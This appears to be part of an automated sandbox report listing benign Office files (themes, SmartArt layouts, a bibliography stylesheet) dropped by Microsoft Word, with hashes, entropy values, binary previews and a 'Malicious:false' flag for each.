                                                                                                                                                                                                                                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):290
                                                                                                                                                                                                                                                                Entropy (8bit):3.5091498509646044
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                                                                                                                                SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                                                                                                                                SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                                                                                                                                SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                                Entropy (8bit):3.4721586910685547
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                                                                                                                                SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                                                                                                                                SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                                                                                                                                SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4243
                                                                                                                                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                                                                                                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                                                                                                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                                                                                                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                                                                                                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1649585
                                                                                                                                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):284
                                                                                                                                                                                                                                                                Entropy (8bit):3.5552837910707304
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                                                                                                                                SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                                                                                                                                SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                                                                                                                                                SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):288
                                                                                                                                                                                                                                                                Entropy (8bit):3.523917709458511
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                                                                                                                                                SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                                                                                                                                                SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                                                                                                                                                SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):296658
                                                                                                                                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                                                                                                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                                                                                                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                                                                                                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                                                                                                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                                Entropy (8bit):3.4670546921349774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                                                                                                                                SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                                                                                                                                SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                                                                                                                                SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5630
                                                                                                                                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):262
                                                                                                                                                                                                                                                                Entropy (8bit):3.4901887319218092
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                                                                                                                                                SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                                                                                                                                                SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                                                                                                                                                SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5596
                                                                                                                                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                                                                                                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                                                                                                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                                                                                                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                                                                                                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):260
                                                                                                                                                                                                                                                                Entropy (8bit):3.4895685222798054
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                                                                                                                                SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                                                                                                                                SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                                                                                                                                SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3075
                                                                                                                                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):264
                                                                                                                                                                                                                                                                Entropy (8bit):3.4866056878458096
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                                                                                                                                                SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                                                                                                                                                SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                                                                                                                                                SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6448
                                                                                                                                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                                                                                                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                                                                                                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                                                                                                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                                                                                                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                                                                                                                                Malicious:false
